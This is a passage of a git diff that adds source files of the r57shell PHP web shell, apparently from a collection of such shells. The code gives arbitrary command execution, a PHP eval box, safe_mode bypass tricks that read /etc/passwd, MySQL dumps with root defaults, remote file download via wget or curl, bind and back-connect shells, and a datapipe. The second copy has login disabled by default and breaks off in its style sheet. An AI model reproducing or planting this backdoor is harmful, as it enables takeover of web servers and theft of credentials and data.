+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while($r_sql = @mysql_fetch_array($r)) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+ } // end : switch($_POST['cmd'])
+
+} // end : if($safe_mode)
+
+// safe_mode Off
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
+{
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+
+
+}
+
+// íå çàâèñèò îò ñåéôà
+if ($_POST['cmd']=="php_eval")
+ {
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql äàìï */
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // èíôà î äàìïå
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= "# homepage: http://rst.void.ru\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // ïîëó÷àåì òåêñò çàïğîñà ñîçäàíèÿ ñòğóêòóğû òàáëèöû
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // ïîëó÷àåì äàííûå òàáëèöû
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    // ïèøåì â ôàéë èëè âûâîäèì â áğàóçåğ
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "[-] ERROR! Can't connect to mysql server";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ } // end if ($_POST['cmd']=="mysql_dump")
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+//////// start table
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute form */
+if(!$safe_mode){
+echo "<form name=command method=post>";
+echo $table_up1; echo $lang[$language.'_text2']; echo $table_up2;
+echo $font;
+echo "<b>".ws(1).$lang[$language.'_text3'].$arrow.ws(4)."</b>";
+echo "<input type=text name=cmd size=85>".ws(2)."<br>";
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* safe_mode form */
+if($safe_mode){
+echo "<form name=safe_ls method=post>";
+echo $table_up1; echo $lang[$language.'_text28']; echo $table_up2;
+echo $font;
+// dir
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_dir>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt6']." \"></form>";
+echo "<form name=safe_cat method=post>";
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=file size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt7']." \"></font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit_file form */
+echo "<form name=edit_file method=post>";
+echo $table_up1; echo $lang[$language.'_text42']; echo $table_up2;
+// dir
+echo $font;
+echo "<b>".$lang[$language.'_text43'].$arrow.ws(4)."</b>";
+echo "<input type=text name=e_name size=85 value=";
+echo (!empty($_POST['e_name'])?($_POST['e_name']):($dir));
+echo ">";
+echo "<input type=hidden name=cmd size=85 value=edit_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt11']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mk/del dir/file form */
+if($safe_mode){
+echo "<form name=mk method=post>";
+echo $table_up1; echo $lang[$language.'_text57']; echo $table_up2;
+// dir
+echo $font;
+echo ws(24)."<b>".$lang[$language.'_text58'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mk_name size=54 value=";
+echo (!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"));
+echo ">";
+echo ws(2)."<select name=action>";
+echo "<option value=create>".$lang[$language.'_text65']."</option>";
+echo "<option value=delete>".$lang[$language.'_text66']."</option>";
+echo "</select>";
+echo ws(2)."<select name=what>";
+echo "<option value=file>".$lang[$language.'_text59']."</option>";
+echo "<option value=dir>".$lang[$language.'_text60']."</option>";
+echo "</select>";
+echo "<input type=hidden name=cmd size=85 value=mk>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt13']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* change perm form */
+if($safe_mode && $unix){
+echo "<form name=ch method=post>";
+echo $table_up1; echo $lang[$language.'_text67']; echo $table_up2;
+// dir
+echo $font;
+echo ws(14)."<b>".$lang[$language.'_text69'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param1 size=40 value=";
+echo (($_POST['param1'])?($_POST['param1']):("filename"));
+echo ">";
+echo ws(2)."<b>".$lang[$language.'_text70'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param2 size=26 value=";
+echo (($_POST['param2'])?($_POST['param2']):("0777"));
+echo " title='".$lang[$language.'_text71']."'><br>";
+echo "<input type=hidden name=cmd size=85 value=ch_>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(15)."<b>".$lang[$language.'_text68'].$arrow.ws(4)."</b>";
+echo ws(2)."<select name=what>";
+echo "<option value=mod>CHMOD</option>";
+echo "<option value=own>CHOWN</option>";
+echo "<option value=grp>CHGRP</option>";
+echo "</select>";
+echo ws(87)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* aliases form */
+if(!$safe_mode){
+echo "<form name=aliases method=POST>";
+echo $table_up1; echo $lang[$language.'_text7']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text54']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text52'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text53'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(5)."<b>".$lang[$language.'_text55'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=m value=1 id=m>";
+echo "<input type=text name=s_mask size=82 value=.txt;.php>  * ( .txt;.php;.htm )";
+echo "<input type=hidden name=cmd size=85 value=search_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text with find form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text76']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text72'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text73'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(6)."<b>".$lang[$language.'_text74'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_mask size=85 value=*.[hc]>".ws(1).$lang[$language.'_text75'];
+echo "<input type=hidden name=cmd size=85 value=find_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php eval form */
+echo "<form name=php method=post>";
+echo $table_up1; echo $lang[$language.'_text32']; echo $table_up2;
+echo $font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=php_eval>";
+echo "<br>".ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 1 form */
+if($safe_mode&&$curl_on)
+{
+echo "<form name=test1 method=post>";
+echo $table_up1; echo $lang[$language.'_text33']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test1_file size=85 value=";
+echo (!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test1>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 2 form */
+if($safe_mode)
+{
+echo "<form name=test2 method=post>";
+echo $table_up1; echo $lang[$language.'_text34']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test2_file size=85 value=";
+echo (!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test2>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 3 form */
+if($safe_mode&&$mysql_on)
+{
+echo "<form name=test3 method=post>";
+echo $table_up1; echo $lang[$language.'_text35']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_md size=15 value=";
+echo (!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"));
+echo ">";
+echo "<b>".ws(13).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_ml size=15 value=";
+echo (!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"));
+echo ">";
+echo "<b>".ws(12).$lang[$language.'_text38'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_mp size=15 value=";
+echo (!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"));
+echo ">";
+echo "<br><b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_file size=85 value=";
+echo (!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test3>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload form */
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1; echo $lang[$language.'_text5']; echo $table_up2;
+echo $font;
+echo "<b>".ws(7).$lang[$language.'_text6'].$arrow.ws(4)."</b>";
+echo "<input type=file name=userfile size=85>&nbsp;";
+echo "<br><b>".ws(20).$lang[$language.'_text21'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=nf1 value=1 id=nf1><input type=text name=new_name size=82>".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host form */
+if(!$safe_mode&&!$windows){
+echo "<form name=remote_upload method=POST>";
+echo $table_up1; echo $lang[$language.'_text15']; echo $table_up2;
+echo $font;
+echo "<b>".ws(13).$lang[$language.'_text16'].$arrow.ws(4)."</b>";
+echo "<select size=\"1\" name=\"with\">";
+echo "<option value=\"wget\">wget</option>";
+echo "<option value=\"fetch\">fetch</option>";
+echo "<option value=\"lynx\">lynx</option>";
+echo "<option value=\"links\">links</option>";
+echo "<option value=\"curl\">curl</option>";
+echo "<option value=\"GET\">GET</option>";
+echo "</select>&nbsp;<br>";
+echo "<b>".ws(7).$lang[$language.'_text17'].$arrow.ws(4)."</b>";
+echo "<input type=text name=rem_file value=http:// size=85>".ws(2)."<br>";
+echo "<b>".ws(7).$lang[$language.'_text18'].$arrow.ws(4)."</b>";
+echo "<input type=text name=loc_file size=85 value=".$dir.">".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql dump form */
+if($mysql_on)
+{
+echo "<form name=mysql_dump method=post>";
+echo $table_up1; echo $lang[$language.'_text40']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text39'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text38'].$arrow.ws(1)."</b>";
+echo "<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br><b>".ws(4).$lang[$language.'_text41'].$arrow.ws(1)."</b>";
+echo "<input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">".ws(1);
+echo ws(4)."<input type=submit name=submit value=\" ".$lang[$language.'_butt9']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind form */
+if(!$safe_mode&&!$windows){
+echo "<form name=bind method=POST>";
+echo $table_up1; echo $lang[$language.'_text9']; echo $table_up2;
+echo $font;
+echo "<b>".ws(14).$lang[$language.'_text10'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=11457>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text11'].$arrow.ws(4)."</b>";
+echo "<input type=text name=bind_pass size=15 value=r57>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt3']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect form */
+if(!$safe_mode&&!$windows){
+echo "<form name=back method=POST>";
+echo $table_up1; echo $lang[$language.'_text12']; echo $table_up2;
+echo $font;
+echo "<b>".ws(22).$lang[$language.'_text13'].$arrow.ws(4)."</b>";
+echo "<input type=text name=ip size=15 value=";
+echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));
+echo ">".ws(1);
+echo "<b>".ws(37).$lang[$language.'_text14'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt4']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe */
+if(!$safe_mode&&!$windows){
+echo "<div align=center><form name=datapipe method=POST>";
+echo $table_up1; echo $lang[$language.'_text22']; echo $table_up2;
+echo $font;
+echo "<b>".ws(2).$lang[$language.'_text23'].$arrow.ws(1)."</b>";
+echo "<input type=text name=local_port size=5 value=\"31337\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text24'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text25'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_port size=5 value=\"6667\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text26'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">datapipe.pl</option>";
+echo "<option value=\"C\">datapipe.c</option>";
+echo "</select>&nbsp;";
+echo ws(2)."<input type=submit name=submit value=\" ".$lang[$language.'_butt5']." \">";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "</font>";
+echo $table_end1;
+echo "</form></div>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/// end table
+echo "</table>";
+/* (c) */
+echo $table_up3;
+echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version ".$version." ]---o</b></font></div>";
+echo "</td></tr></table>$f";
+
+/* -------------------------[ EOF ]------------------------- */
+?>
diff --git a/138shell/R/r57.php.txt b/138shell/R/r57.php.txt
new file mode 100644
index 0000000..55bebd5
--- /dev/null
+++ b/138shell/R/r57.php.txt
@@ -0,0 +1,2206 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #                             
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.31
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? rst@void.ru. ??? ??????????? ????? ???????????. 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ????????? | Options  ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ????????  ( authentification = On  )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0; 
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
+// Login & password crypted with md5, default is 'r57'
+$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ????????????  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password)
+/******************************************************************************************************/
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- ??????????, ???? -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+.table1 {
+BORDER: 0px;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+.td1 {
+BORDER: 0px;
+font: 7pt Verdana;
+color: #000000;
+}
+.tr1 {
+BORDER: 0px;
+color: #000000;
+}
+table {
+BORDER:  #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+color: #000000;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
